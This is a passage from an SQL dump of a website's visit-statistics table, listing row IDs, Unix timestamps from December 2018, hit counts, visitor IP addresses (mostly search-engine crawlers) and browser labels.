rome'),(358216,1545721970,3,3,0,0,'66.249.66.40','chrome'),(358217,1545722602,1,1,0,0,'66.249.66.156','chrome'),(358218,1545722629,2,2,0,0,'66.249.66.152','chrome'),(358219,1545722815,1,1,0,0,'66.249.66.157','chrome'),(358220,1545722820,1,1,0,0,'66.249.66.61','chrome'),(358221,1545722840,1,1,0,0,'180.76.15.147','other'),(358222,1545722846,1,1,0,0,'66.249.66.42','chrome'),(358223,1545722970,2,2,0,0,'66.249.66.154','chrome'),(358224,1545723073,1,1,0,0,'95.163.255.175','other'),(358225,1545723519,1,1,0,0,'46.229.168.152','other'),(358226,1545723521,1,1,0,0,'46.229.168.144','other'),(358227,1545724054,1,1,0,0,'157.55.39.130','other'),(358228,1545724612,1,1,0,0,'5.45.207.79','other'),(358229,1545724633,3,3,0,0,'46.211.114.104','chrome'),(358230,1545724655,5,5,0,0,'216.244.66.241','other'),(358231,1545724829,1,1,0,0,'87.250.224.47','other'),(358232,1545724996,1,1,0,0,'66.249.66.156','chrome'),(358233,1545725019,1,1,0,0,'66.249.66.152','chrome'),(358234,1545725244,3,3,0,0,'95.108.213.4','other'),(358235,1545725387,4,4,0,0,'178.154.244.11','other'),(358236,1545725453,1,1,0,0,'141.8.142.103','other'),(358237,1545725815,4,4,0,0,'87.250.224.47','other'),(358238,1545725829,2,2,0,0,'40.77.167.125','other'),(358239,1545725927,3,3,0,0,'5.45.207.79','other'),(358240,1545726067,2,2,0,0,'37.9.113.148','other'),(358241,1545726078,2,2,0,0,'46.211.114.104','chrome'),(358242,1545726121,1,1,0,0,'157.55.39.130','other'),(358243,1545726221,3,3,0,0,'95.108.213.4','other'),(358244,1545726251,1,1,0,0,'66.249.66.59','chrome'),(358245,1545726273,1,1,0,0,'66.249.66.42','chrome'),(358246,1545726277,2,2,0,0,'66.249.66.57','chrome'),(358247,1545726278,1,1,0,0,'213.180.203.9','other'),(358248,1545726307,1,1,0,0,'66.249.66.44','chrome'),(358249,1545726356,2,2,0,0,'141.8.142.103','other'),(358250,1545726407,4,4,0,0,'178.154.244.11','other'),(358251,1545726512,1,1,0,0,'37.9.113.20','other'),(358252,1545726556,1,1,0,0,'5.45.207.19','other'),(358253,1545726615,1,1,0,0,'66.249.66.40','chrome'),(358254,1545726824,1,1,0,0,'8.29.198.25','other'),(358255,1545726877,1,1,0,0,'87.250.224.65','other'),(358256,1545727050,1,1,0,0,'66.249.66.157','chrome'),(358257,1545727068,1,1,0,0,'66.249.66.154','chrome'),(358258,1545727305,1,1,0,0,'66.249.66.57','chrome'),(358259,1545727325,2,2,0,0,'66.249.66.42','chrome'),(358260,1545727341,5,5,0,0,'178.154.244.11','other'),(358261,1545727444,2,2,0,0,'66.249.66.156','chrome'),(358262,1545727772,1,1,0,0,'8.29.198.25','other'),(358263,1545727900,1,1,0,0,'5.45.207.19','other'),(358264,1545727947,1,1,0,0,'216.244.66.241','other'),(358265,1545728106,1,1,0,0,'141.8.142.103','other'),(358266,1545728179,1,1,0,0,'66.249.66.59','chrome'),(358267,1545728204,1,1,0,0,'95.108.213.4','other'),(358268,1545728289,1,1,0,0,'95.163.255.187','other'),(358269,1545728605,1,1,0,0,'46.229.168.132','other'),(358270,1545728607,1,1,0,0,'46.229.168.139','other'),(358271,1545728858,3,3,0,0,'178.154.244.11','other'),(358272,1545728873,1,1,0,0,'95.163.255.156','other'),(358273,1545729009,2,2,0,0,'141.8.142.103','other'),(358274,1545729154,1,1,0,0,'5.45.207.79','other'),(358275,1545729227,1,1,0,0,'95.163.255.187','other'),(358276,1545729266,2,2,0,0,'40.77.167.91','other'),(358277,1545729631,1,1,0,0,'95.163.255.192','other'),(358278,1545729762,1,1,0,0,'216.244.66.241','other'),(358279,1545729822,1,1,0,0,'95.163.255.92','other'),(358280,1545729909,2,2,0,0,'5.45.207.19','other'),(358281,1545729958,1,1,0,0,'66.249.66.155','chrome'),(358282,1545729998,1,1,0,0,'95.108.213.4','other'),(358283,1545730000,2,2,0,0,'66.249.66.156','chrome'),(358284,1545730032,1,1,0,0,'46.229.168.132','other'),(358285,1545730129,2,2,0,0,'141.8.142.103','other'),(358286,1545730278,4,4,0,0,'66.249.66.59','chrome'),(358287,1545730297,4,4,0,0,'66.249.66.42','chrome'),(358288,1545730306,1,1,0,0,'157.55.39.130','other'),(358289,1545730338,3,3,0,0,'66.249.66.61','chrome'),(358290,1545730355,3,3,0,0,'66.249.66.57','chrome'),(358291,1545730359,5,5,0,0,'66.249.66.40','chrome'),(358292,1545730421,1,1,0,0,'207.46.13.111','other'),(358293,1545730751,1,1,0,0,'207.46.13.60','other'),(358294,1545730785,6,6,0,0,'216.244.66.241','other'),(358295,1545731170,1,1,0,0,'66.249.66.44','chrome'),(358296,1545731207,1,1,0,0,'66.249.66.155','chrome'),(358297,1545731224,2,2,0,0,'66.249.66.154','chrome'),(358298,1545731294,1,1,0,0,'66.249.66.156','chrome'),(358299,1545731318,1,1,0,0,'66.249.66.152','chrome'),(358300,1545731895,1,1,0,0,'66.249.66.157','chrome'),(358301,1545732015,1,1,0,0,'66.249.66.57','chrome'),(358302,1545732042,1,1,0,0,'66.249.66.42','chrome'),(358303,1545732197,1,1,0,0,'66.249.66.201','chrome'),(358304,1545732212,1,1,0,0,'207.46.13.111','other'),(358305,1545732234,1,1,0,0,'66.249.66.220','chrome'),(358306,1545732732,1,1,0,0,'157.55.39.130','other'),(358307,1545732961,1,1,0,0,'46.229.168.140','other'),(358308,1545733608,1,1,0,0,'46.229.168.139','other'),(358309,1545734045,4,4,0,0,'216.244.66.241','other'),(358310,1545734248,2,2,0,0,'157.55.39.151','other'),(358311,1545734492,1,1,0,0,'157.55.39.130','other'),(358312,1545735373,1,1,0,0,'46.229.168.147','other'),(358313,1545735595,1,1,0,0,'95.163.255.92','other'),(358314,1545735739,1,1,0,0,'209.17.96.50','other'),(358315,1545735830,2,2,0,0,'178.154.244.11','other'),(358316,1545735867,1,1,0,0,'216.244.66.241','other'),(358317,1545736080,1,1,0,0,'66.249.66.155','chrome'),(358318,1545736096,1,1,0,0,'66.249.66.154','chrome'),(358319,1545736507,1,1,0,0,'5.45.207.79','other'),(358320,1545737156,3,3,0,0,'216.244.66.241','other'),(358321,1545737447,1,1,0,0,'13.66.139.0','other'),(358322,1545737673,1,1,0,0,'8.29.198.25','other'),(358323,1545738004,1,1,0,0,'91.211.121.227','chrome'),(358324,1545738023,1,1,0,0,'87.250.224.47','other'),(358325,1545738158,1,1,0,0,'40.77.167.126','other'),(358326,1545738291,1,1,0,0,'95.108.213.4','other'),(358327,1545738320,1,1,0,0,'37.9.113.20','other'),(358328,1545738608,1,1,0,0,'8.29.198.27','other'),(358329,1545738873,1,1,0,0,'5.45.207.79','other'),(358330,1545739144,1,1,0,0,'66.249.66.154','chrome'),(358331,1545739241,1,1,0,0,'95.108.213.4','other'),(358332,1545739999,6,6,0,0,'216.244.66.241','other'),(358333,1545740005,1,1,0,0,'64.246.165.210','firefox'),(358334,1545740266,2,2,0,0,'46.229.168.149','other'),(358335,1545740716,4,4,0,0,'141.8.142.103','other'),(358336,1545741346,1,1,0,0,'46.229.168.132','other'),(358337,1545741675,2,2,0,0,'216.244.66.241','other'),(358338,1545741683,1,1,0,0,'66.249.66.59','chrome'),(358339,1545741701,1,1,0,0,'66.249.66.42','chrome'),(358340,1545741732,1,1,0,0,'66.249.66.156','chrome'),(358341,1545741775,2,2,0,0,'207.46.13.111','other'),(358342,1545741891,1,1,0,0,'207.46.13.60','other'),(358343,1545742436,1,1,0,0,'157.55.39.130','other'),(358344,1545742853,1,1,0,0,'66.249.66.57','chrome'),(358345,1545742887,1,1,0,0,'66.249.66.42','chrome'),(358346,1545743115,5,5,0,0,'216.244.66.241','other'),(358347,1545743365,1,1,0,0,'66.249.66.154','chrome'),(358348,1545743624,1,1,0,0,'66.249.66.155','chrome'),(358349,1545743655,1,1,0,0,'66.249.66.156','chrome'),(358350,1545743978,1,1,0,0,'46.229.168.129','other'),(358351,1545744508,2,2,0,0,'94.45.141.98','chrome'),(358352,1545744651,1,1,0,0,'13.57.233.99','chrome'),(358353,1545745748,3,3,0,0,'94.45.141.98','chrome'),(358354,1545745935,6,6,0,0,'216.244.66.241','other'),(358355,1545746034,1,1,0,0,'207.46.13.60','other'),(358356,1545746186,1,1,0,0,'66.249.66.57','chrome'),(358357,1545746235,1,1,0,0,'66.249.66.40','chrome'),(358358,1545747530,2,2,0,0,'40.77.167.49','other'),(358359,1545747877,1,1,0,0,'207.46.13.111','other'),(358360,1545748513,1,1,0,0,'8.29.198.25','other'),(358361,1545748528,1,1,0,0,'5.45.207.19','other'),(358362,1545748737,1,1,0,0,'46.229.168.143','other'),(358363,1545749111,5,5,0,0,'216.244.66.241','other'),(358364,1545749455,5,5,0,0,'5.45.207.79','other'),(358365,1545749468,1,1,0,0,'87.250.224.47','other'),(358366,1545749496,1,1,0,0,'8.29.198.25','other'),(358367,1545749653,3,3,0,0,'141.8.142.103','other'),(358368,1545749926,7,7,0,0,'178.154.244.11','other'),(358369,1545749940,1,1,0,0,'180.76.15.135','other'),(358370,1545750046,7,7,0,0,'5.45.207.19','other'),(358371,1545750204,1,1,0,0,'66.249.66.152','chrome'),(358372,1545750353,1,1,0,0,'87.250.224.65','other'),(358373,1545750355,1,1,0,0,'37.9.113.103','other'),(358374,1545750399,7,7,0,0,'5.45.207.79','other'),(358375,1545750489,1,1,0,0,'95.108.213.4','other'),(358376,1545750749,1,1,0,0,'87.250.224.47','other'),(358377,1545750852,1,1,0,0,'141.8.142.103','other'),(358378,1545750882,1,1,0,0,'46.229.168.150','other'),(358379,1545750884,1,1,0,0,'46.229.168.149','other'),(358380,1545750969,5,5,0,0,'178.154.244.11','other'),(358381,1545751042,1,1,0,0,'95.163.255.169','other'),(358382,1545751563,3,3,0,0,'207.46.13.111','other'),(358383,1545751905,1,1,0,0,'178.154.244.11','other'),(358384,1545751971,1,1,0,0,'66.249.66.157','chrome'),(358385,1545751972,1,1,0,0,'66.249.66.154','chrome'),(358386,1545751993,1,1,0,0,'46.229.168.134','other'),(358387,1545752019,5,5,0,0,'216.244.66.241','other'),(358388,1545752221,1,1,0,0,'5.45.207.19','other'),(358389,1545752447,1,1,0,0,'141.8.142.103','other'),(358390,1545752593,1,1,0,0,'46.229.168.150','other'),(358391,1545752919,1,1,0,0,'46.229.168.138','other'),(358392,1545752935,1,1,0,0,'157.55.39.130','other'),(358393,1545753657,1,1,0,0,'40.77.167.134','other'),(358394,1545754158,1,1,0,0,'178.154.244.11','other'),(358395,1545754429,1,1,0,0,'46.229.168.149','other'),(358396,1545754827,2,2,0,0,'46.211.132.209','chrome'),(358397,1545755037,4,4,0,0,'216.244.66.241','other'),(358398,1545755554,2,2,0,0,'207.46.13.60','other'),(358399,1545755961,1,1,0,0,'46.229.168.133','other'),(358400,1545756195,1,1,0,0,'40.77.167.134','other'),(358401,1545756389,1,1,0,0,'46.227.140.201','chrome'),(358402,1545756418,1,1,0,0,'40.77.167.151','other'),(358403,1545756819,1,1,0,0,'46.229.168.143','other'),(358404,1545757290,1,1,0,0,'178.154.244.11','other'),(358405,1545757534,3,3,0,0,'40.77.167.151','other'),(358406,1545757662,1,1,0,0,'5.58.78.201','opera'),(358407,1545757715,1,1,0,0,'207.46.13.111','other'),(358408,1545757920,4,4,0,0,'216.244.66.241','other'),(358409,1545758101,2,2,0,0,'91.196.178.76','firefox'),(358410,1545759050,114,114,0,0,'46.4.107.106','other'),(358411,1545759351,1,1,0,0,'8.29.198.25','other'),(358412,1545759657,2,2,0,0,'5.45.207.19','other'),(358413,1545759726,2,2,0,0,'178.154.244.11','other'),(358414,1545759951,36,36,0,0,'46.4.107.106','other'),(358415,1545760342,1,1,0,0,'8.29.198.25','other'),(358416,1545760359,1,1,0,0,'95.108.213.4','other'),(358417,1545760380,3,3,0,0,'141.8.142.103','other'),(358418,1545760583,4,4,0,0,'5.45.207.79','other'),(358419,1545760778,2,2,0,0,'91.209.11.236','other'),(358420,1545760787,1,1,0,0,'5.45.207.19','other'),(358421,1545760875,11,11,0,0,'46.4.107.106','other'),(358422,1545761146,2,2,0,0,'216.244.66.241','other'),(358423,1545761223,1,1,0,0,'178.154.244.11','other'),(358424,1545761670,3,3,0,0,'5.45.207.79','other'),(358425,1545761777,24,24,0,0,'46.4.107.106','other'),(358426,1545761832,2,2,0,0,'185.210.84.132','firefox'),(358427,1545761838,3,3,0,0,'5.45.207.19','other'),(358428,1545762207,1,1,0,0,'141.8.142.103','other'),(358429,1545762227,1,1,0,0,'46.229.168.154','other'),(358430,1545762397,1,1,0,0,'46.229.168.137','other'),(358431,1545762626,1,1,0,0,'95.108.213.4','other'),(358432,1545762653,3,3,0,0,'178.154.244.11','other'),(358433,1545762658,4,4,0,0,'5.45.207.79','other'),(358434,1545762809,1,1,0,0,'37.9.113.103','other'),(358435,1545763137,3,3,0,0,'207.46.13.111','other'),(358436,1545763166,1,1,0,0,'141.8.142.103','other'),(358437,1545763381,1,1,0,0,'46.229.168.144','other'),(358438,1545763686,1,1,0,0,'178.154.244.11','other'),(358439,1545764005,1,1,0,0,'5.45.207.19','other'),(358440,1545764015,5,5,0,0,'216.244.66.241','other'),(358441,1545764186,1,1,0,0,'46.229.168.146','other'),(358442,1545764540,1,1,0,0,'141.8.142.103','other'),(358443,1545766024,1,1,0,0,'95.108.213.4','other'),(358444,1545766047,1,1,0,0,'178.154.244.11','other'),(358445,1545766938,2,2,0,0,'216.244.66.241','other'),(358446,1545766970,1,1,0,0,'46.229.168.129','other'),(358447,1545767029,1,1,0,0,'178.154.244.11','other'),(358448,1545767169,5,5,0,0,'207.46.13.60','other'),(358449,1545767651,1,1,0,0,'95.163.255.104','other'),(358450,1545768101,1,1,0,0,'66.249.66.156','chrome'),(358451,1545768118,1,1,0,0,'95.163.255.115','other'),(358452,1545768123,1,1,0,0,'40.77.167.14','other'),(358453,1545768497,1,1,0,0,'46.166.137.215','other'),(358454,1545768726,1,1,0,0,'95.163.255.107','other'),(358455,1545769003,1,1,0,0,'95.163.255.102','other'),(358456,1545769214,1,1,0,0,'40.77.167.100','other'),(358457,1545769240,2,2,0,0,'95.163.255.115','other'),(358458,1545769249,1,1,0,0,'95.163.255.108','other'),(358459,1545769464,1,1,0,0,'95.163.255.116','other'),(358460,1545769780,1,1,0,0,'95.163.255.103','other'),(358461,1545769912,2,2,0,0,'95.163.255.109','other'),(358462,1545770038,1,1,0,0,'95.163.255.106','other'),(358463,1545770046,4,4,0,0,'216.244.66.241','other'),(358464,1545770129,1,1,0,0,'207.46.13.60','other'),(358465,1545770174,1,1,0,0,'95.163.255.117','other'),(358466,1545770187,1,1,0,0,'8.29.198.25','other'),(358467,1545770431,1,1,0,0,'95.163.255.113','other'),(358468,1545770641,1,1,0,0,'95.163.255.119','other'),(358469,1545770693,13,13,0,0,'5.45.207.79','other'),(358470,1545770729,1,1,0,0,'95.163.255.103','other'),(358471,1545770778,7,7,0,0,'5.45.207.19','other'),(358472,1545770907,7,7,0,0,'141.8.142.103','other'),(358473,1545770936,8,8,0,0,'178.154.244.11','other'),(358474,1545770972,4,4,0,0,'87.250.224.47','other'),(358475,1545771033,2,2,0,0,'46.229.168.147','other'),(358476,1545771129,1,1,0,0,'40.77.167.14','other'),(358477,1545771177,1,1,0,0,'8.29.198.26','other'),(358478,1545771251,3,3,0,0,'95.108.213.4','other'),(358479,1545771291,1,1,0,0,'46.229.168.148','other'),(358480,1545771606,1,1,0,0,'46.229.168.137','other'),(358481,1545771693,2,2,0,0,'5.45.207.19','other'),(358482,1545771724,5,5,0,0,'5.45.207.79','other'),(358483,1545771801,1,1,0,0,'40.77.167.97','other'),(358484,1545771931,2,2,0,0,'141.8.142.103','other'),(358485,1545772041,3,3,0,0,'178.154.244.11','other'),(358486,1545772648,1,1,0,0,'141.8.183.22','other'),(358487,1545772724,1,1,0,0,'46.229.168.154','other'),(358488,1545772960,1,1,0,0,'207.46.13.106','other'),(358489,1545773081,4,4,0,0,'216.244.66.241','other'),(358490,1545773388,1,1,0,0,'40.77.167.97','other'),(358491,1545773403,1,1,0,0,'178.154.200.48','other'),(358492,1545773456,1,1,0,0,'87.250.224.118','other'),(358493,1545773508,1,1,0,0,'40.77.167.100','other'),(358494,1545773597,1,1,0,0,'87.250.224.47','other'),(358495,1545773619,1,1,0,0,'46.229.168.150','other'),(358496,1545773931,1,1,0,0,'178.154.244.11','other'),(358497,1545774363,1,1,0,0,'207.46.13.60','other'),(358498,1545774840,1,1,0,0,'207.46.13.128','other'),(358499,1545774876,2,2,0,0,'207.46.13.106','other'),(358500,1545774981,1,1,0,0,'5.45.207.19','other'),(358501,1545775429,1,1,0,0,'87.250.224.65','other'),(358502,1545775747,4,4,0,0,'216.244.66.241','other'),(358503,1545775978,2,2,0,0,'95.163.255.104','other'),(358504,1545776253,1,1,0,0,'5.45.207.19','other'),(358505,1545776611,2,2,0,0,'52.53.201.78','chrome'),(358506,1545776778,2,2,0,0,'216.244.66.241','other'),(358507,1545776853,1,1,0,0,'207.46.13.106','other'),(358508,1545776945,1,1,0,0,'46.229.168.145','other'),(358509,1545776989,1,1,0,0,'46.229.168.149','other'),(358510,1545776998,1,1,0,0,'141.8.142.103','other'),(358511,1545777037,2,2,0,0,'207.46.13.128','other'),(358512,1545777505,3,3,0,0,'5.45.207.79','other'),(358513,1545777616,1,1,0,0,'95.163.255.63','other'),(358514,1545777619,1,1,0,0,'95.163.255.64','other'),(358515,1545777632,2,2,0,0,'40.77.167.14','other'),(358516,1545778228,11,11,0,0,'69.30.198.186','other'),(358517,1545778673,1,1,0,0,'207.46.13.106','other'),(358518,1545778765,9,9,0,0,'216.244.66.241','other'),(358519,1545778961,160,160,0,0,'5.9.71.213','other'),(358520,1545779170,2,2,0,0,'178.95.245.219','chrome'),(358521,1545779172,1,1,0,0,'207.46.13.128','other'),(358522,1545779354,1,1,0,0,'37.9.113.148','other'),(358523,1545779541,3,3,0,0,'207.46.13.60','other'),(358524,1545779644,1,1,0,0,'46.229.168.132','other'),(358525,1545779749,1,1,0,0,'216.244.66.241','other'),(358526,1545780756,3,3,0,0,'5.45.207.19','other'),(358527,1545780807,1,1,0,0,'141.8.142.103','other'),(358528,1545781039,1,1,0,0,'8.29.198.27','other'),(358529,1545781534,2,2,0,0,'95.213.141.126','opera'),(358530,1545781754,1,1,0,0,'46.229.168.149','other'),(358531,1545781929,4,4,0,0,'216.244.66.241','other'),(358532,1545781999,4,4,0,0,'141.8.142.103','other'),(358533,1545782010,7,7,0,0,'5.45.207.19','other'),(358534,1545782014,1,1,0,0,'8.29.198.25','other'),(358535,1545782076,1,1,0,0,'207.46.13.106','other'),(358536,1545782180,2,2,0,0,'5.45.207.79','other'),(358537,1545782199,6,6,0,0,'178.154.244.11','other'),(358538,1545782236,1,1,0,0,'95.108.213.4','other'),(358539,1545782576,1,1,0,0,'40.77.167.14','other'),(358540,1545783432,1,1,0,0,'5.45.207.79','other'),(358541,1545784771,3,3,0,0,'216.244.66.241','other'),(358542,1545784821,1,0,1,0,'66.249.66.157',''),(358543,1545784822,1,0,1,0,'66.249.66.156',''),(358544,1545785141,1,1,0,0,'157.55.39.125','other'),(358545,1545785219,1,1,0,0,'178.154.244.11','other'),(358546,1545785253,2,2,0,0,'5.45.207.19','other'),(358547,1545785256,1,1,0,0,'95.108.213.4','other'),(358548,1545785257,1,1,0,0,'5.45.207.79','other'),(358549,1545785594,1,1,0,0,'46.229.168.132','other'),(358550,1545785596,1,1,0,0,'46.229.168.154','other'),(358551,1545785722,1,1,0,0,'185.220.101.13','other'),(358552,1545785724,1,1,0,0,'192.42.116.18','other'),(358553,1545786098,1,1,0,0,'46.229.168.134','other'),(358554,1545786166,2,2,0,0,'216.244.66.241','other'),(358555,1545787230,1,1,0,0,'207.46.13.106','other'),(358556,1545787270,1,1,0,0,'46.229.168.130','other'),(358557,1545787399,1,1,0,0,'66.249.66.157','chrome'),(358558,1545787400,1,1,0,0,'66.249.66.156','chrome'),(358559,1545787635,3,3,0,0,'216.244.66.241','other'),(358560,1545788946,1,1,0,0,'216.244.66.241','other'),(358561,1545789348,1,1,0,0,'95.163.255.160','other'),(358562,1545789703,2,2,0,0,'207.46.13.60','other'),(358563,1545790456,1,1,0,0,'46.229.168.140','other'),(358564,1545790458,1,1,0,0,'46.229.168.133','other'),(358565,1545790759,5,5,0,0,'216.244.66.241','other'),(358566,1545791451,1,1,0,0,'207.46.13.173','other'),(358567,1545791505,1,1,0,0,'46.229.168.136','other'),(358568,1545791632,2,2,0,0,'141.8.142.103','other'),(358569,1545791877,1,1,0,0,'8.29.198.26','other'),(358570,1545792298,2,2,0,0,'216.244.66.241','other'),(358571,1545792331,3,3,0,0,'178.154.244.11','other'),(358572,1545792335,1,1,0,0,'87.250.224.47','other'),(358573,1545792364,3,3,0,0,'37.9.113.148','other'),(358574,1545792389,1,1,0,0,'213.180.203.40','other'),(358575,1545792492,2,2,0,0,'95.108.213.4','other'),(358576,1545792593,4,4,0,0,'5.45.207.79','other'),(358577,1545792605,2,2,0,0,'141.8.142.103','other'),(358578,1545792655,3,3,0,0,'5.45.207.19','other'),(358579,1545792767,1,1,0,0,'178.154.171.24','other'),(358580,1545792857,1,1,0,0,'8.29.198.27','other'),(358581,1545792952,1,1,0,0,'95.163.255.106','other'),(358582,1545792975,1,1,0,0,'157.55.39.226','other'),(358583,1545793155,1,1,0,0,'180.76.15.24','other'),(358584,1545793156,1,1,0,0,'180.76.15.145','other'),(358585,1545793216,1,1,0,0,'95.163.255.119','other'),(358586,1545793571,4,4,0,0,'5.45.207.79','other'),(358587,1545793654,5,5,0,0,'216.244.66.241','other'),(358588,1545793787,1,1,0,0,'178.154.244.11','other'),(358589,1545794255,1,1,0,0,'141.8.142.103','other'),(358590,1545794274,1,1,0,0,'207.46.13.162','other'),(358591,1545794296,1,1,0,0,'5.45.207.19','other'),(358592,1545794344,1,1,0,0,'95.108.181.54','other'),(358593,1545794569,1,1,0,0,'216.244.66.241','other'),(358594,1545795189,2,2,0,0,'52.37.247.177','chrome'),(358595,1545795248,1,1,0,0,'95.108.181.75','other'),(358596,1545795635,1,1,0,0,'216.244.66.241','other'),(358597,1545795932,1,1,0,0,'207.46.13.162','other'),(358598,1545796622,4,4,0,0,'216.244.66.241','other'),(358599,1545797054,1,1,0,0,'46.229.168.132','other'),(358600,1545797150,2,2,0,0,'40.77.167.149','other'),(358601,1545797570,2,2,0,0,'66.249.66.42','chrome'),(358602,1545797619,2,2,0,0,'216.244.66.241','other'),(358603,1545797824,2,2,0,0,'37.9.113.103','other'),(358604,1545797934,1,1,0,0,'207.46.13.162','other'),(358605,1545798175,2,2,0,0,'46.133.119.185','chrome'),(358606,1545798345,2,2,0,0,'37.9.113.148','other'),(358607,1545798436,2,2,0,0,'178.154.244.11','other'),(358608,1545798448,1,1,0,0,'141.8.142.103','other'),(358609,1545798456,1,1,0,0,'5.45.207.79','other'),(358610,1545798552,2,2,0,0,'87.250.224.47','other'),(358611,1545798673,1,1,0,0,'46.229.168.150','other'),(358612,1545798720,2,2,0,0,'66.249.66.156','chrome'),(358613,1545798981,1,1,0,0,'5.45.207.19','other'),(358614,1545799360,2,2,0,0,'178.154.244.11','other'),(358615,1545799558,1,1,0,0,'18.184.52.215','other'),(358616,1545799645,8,8,0,0,'216.244.66.241','other'),(358617,1545799646,2,2,0,0,'207.46.13.160','other'),(358618,1545800459,1,1,0,0,'95.163.255.187','other'),(358619,1545800855,2,2,0,0,'60.191.38.77','firefox'),(358620,1545800890,1,1,0,0,'40.77.167.149','other'),(358621,1545801481,1,1,0,0,'216.244.66.241','other'),(358622,1545801486,1,1,0,0,'207.241.231.165','other'),(358623,1545802059,2,2,0,0,'207.46.13.85','other'),(358624,1545802291,1,1,0,0,'46.229.168.135','other'),(358625,1545802293,1,1,0,0,'46.229.168.141','other'),(358626,1545802580,1,1,0,0,'46.229.168.147','other'),(358627,1545802720,1,1,0,0,'8.29.198.27','other'),(358628,1545802762,5,5,0,0,'216.244.66.241','other'),(358629,1545802769,1,1,0,0,'40.77.167.67','other'),(358630,1545803704,1,1,0,0,'8.29.198.27','other'),(358631,1545803847,1,1,0,0,'46.229.168.142','other'),(358632,1545804142,1,1,0,0,'66.249.66.155','chrome'),(358633,1545804147,1,1,0,0,'66.249.66.152','chrome'),(358634,1545804453,1,1,0,0,'207.46.13.162','other'),(358635,1545804990,2,2,0,0,'91.196.178.83','chrome'),(358636,1545805444,1,1,0,0,'213.180.203.9','other'),(358637,1545805510,4,4,0,0,'178.154.244.11','other'),(358638,1545805566,1,1,0,0,'95.108.181.75','other'),(358639,1545805594,1,1,0,0,'66.249.66.154','chrome'),(358640,1545805703,1,1,0,0,'46.229.168.129','other'),(358641,1545805704,3,3,0,0,'216.244.66.241','other'),(358642,1545805743,7,7,0,0,'5.45.207.79','other'),(358643,1545805779,2,2,0,0,'95.108.213.4','other'),(358644,1545805905,1,1,0,0,'37.9.113.103','other'),(358645,1545805958,3,3,0,0,'141.8.142.103','other'),(358646,1545806019,5,5,0,0,'5.45.207.19','other'),(358647,1545806315,3,3,0,0,'87.250.224.47','other'),(358648,1545806351,1,1,0,0,'37.9.113.20','other'),(358649,1545806522,5,5,0,0,'178.154.244.11','other'),(358650,1545806606,2,2,0,0,'91.196.178.83','chrome'),(358651,1545806828,4,4,0,0,'5.45.207.79','other'),(358652,1545807144,1,1,0,0,'66.249.66.61','chrome'),(358654,1545807150,1,1,0,0,'66.249.66.156','chrome'),(358655,1545807151,1,1,0,0,'66.249.66.152','chrome'),(358656,1545807215,2,2,0,0,'91.196.178.90','chrome'),(358657,1545808096,2,2,0,0,'195.10.210.70','chrome'),(358658,1545808176,1,1,0,0,'207.46.13.34','other'),(358659,1545808260,2,2,0,0,'40.77.167.129','other'),(358660,1545808565,1,1,0,0,'46.229.168.137','other'),(358661,1545808567,1,1,0,0,'46.229.168.141','other'),(358662,1545808705,7,7,0,0,'216.244.66.241','other'),(358663,1545808820,1,1,0,0,'46.229.168.140','other'),(358664,1545809655,1,1,0,0,'46.229.168.133','other'),(358665,1545809661,1,1,0,0,'66.249.66.42','chrome'),(358666,1545810101,2,2,0,0,'91.196.121.8','chrome'),(358667,1545810442,2,2,0,0,'212.90.61.101','chrome'),(358668,1545810948,1,1,0,0,'46.229.168.144','other'),(358669,1545811355,2,2,0,0,'192.162.35.137','chrome'),(358670,1545811429,1,1,0,0,'95.163.255.191','other'),(358671,1545811441,1,1,0,0,'109.169.193.251','chrome'),(358672,1545811661,1,1,0,0,'195.69.223.142','chrome'),(358673,1545811832,4,4,0,0,'216.244.66.241','other'),(358674,1545812525,1,1,0,0,'195.62.62.247','chrome'),(358675,1545812651,1,1,0,0,'46.229.168.143','other'),(358676,1545812660,1,1,0,0,'66.249.66.156','chrome'),(358677,1545812877,3,3,0,0,'40.77.167.129','other'),(358678,1545812912,1,1,0,0,'46.229.168.135','other'),(358679,1545813142,1,1,0,0,'46.229.168.137','other'),(358680,1545813144,1,1,0,0,'66.249.66.44','chrome'),(358681,1545813263,1,1,0,0,'66.249.66.154','chrome'),(358682,1545813270,2,2,0,0,'46.229.168.151','other'),(358683,1545813561,1,1,0,0,'8.29.198.27','other'),(358684,1545813842,1,1,0,0,'46.229.168.144','other'),(358685,1545814549,1,1,0,0,'8.29.198.25','other'),(358686,1545814620,3,3,0,0,'91.196.178.163','chrome'),(358687,1545814806,2,2,0,0,'91.209.11.236','other'),(358688,1545814810,4,4,0,0,'216.244.66.241','other'),(358689,1545814951,1,1,0,0,'178.92.157.241','chrome'),(358690,1545815595,1,1,0,0,'213.180.203.17','other'),(358691,1545815626,1,1,0,0,'66.249.66.42','chrome'),(358692,1545815777,5,5,0,0,'91.196.178.83','chrome'),(358693,1545815874,1,1,0,0,'216.244.66.241','other'),(358694,1545816383,1,1,0,0,'40.77.167.39','other'),(358695,1545816800,1,1,0,0,'130.180.218.227','firefox'),(358696,1545816856,3,3,0,0,'141.8.142.103','other'),(358697,1545816909,3,3,0,0,'87.250.224.47','other'),(358698,1545816918,4,4,0,0,'5.45.207.19','other'),(358699,1545817010,1,1,0,0,'40.77.167.97','other'),(358700,1545817054,5,5,0,0,'5.45.207.79','other'),(358701,1545817059,1,1,0,0,'66.249.66.154','chrome'),(358702,1545817077,1,1,0,0,'66.249.66.156','chrome'),(358703,1545817078,1,1,0,0,'66.249.66.152','chrome'),(358704,1545817145,4,4,0,0,'178.154.244.11','other'),(358705,1545817307,1,1,0,0,'95.108.213.4','other'),(358706,1545817731,1,1,0,0,'130.180.218.227','firefox'),(358707,1545817891,2,2,0,0,'216.244.66.241','other'),(358708,1545817992,1,1,0,0,'5.45.207.8','other'),(358709,1545817993,1,1,0,0,'178.154.244.65','other'),(358710,1545818063,1,1,0,0,'207.46.13.50','other'),(358711,1545818550,1,1,0,0,'95.108.181.54','other'),(358712,1545818797,1,1,0,0,'91.196.178.66','chrome'),(358713,1545819029,2,2,0,0,'91.196.177.46','firefox'),(358714,1545819151,2,2,0,0,'130.180.218.227','firefox'),(358715,1545819250,2,2,0,0,'91.196.178.163','chrome'),(358716,1545819790,1,1,0,0,'207.46.13.109','other'),(358717,1545820093,2,2,0,0,'66.249.66.155','chrome'),(358718,1545820094,1,1,0,0,'66.249.66.154','chrome'),(358719,1545820136,1,1,0,0,'91.196.178.66','chrome'),(358720,1545820522,1,1,0,0,'37.9.113.148','other'),(358721,1545820525,1,1,0,0,'157.55.39.188','other'),(358722,1545820635,1,1,0,0,'5.45.207.79','other'),(358723,1545820686,1,1,0,0,'178.154.244.11','other'),(358724,1545820891,3,3,0,0,'216.244.66.241','other'),(358725,1545821137,1,1,0,0,'66.249.66.40','chrome'),(358726,1545821633,1,1,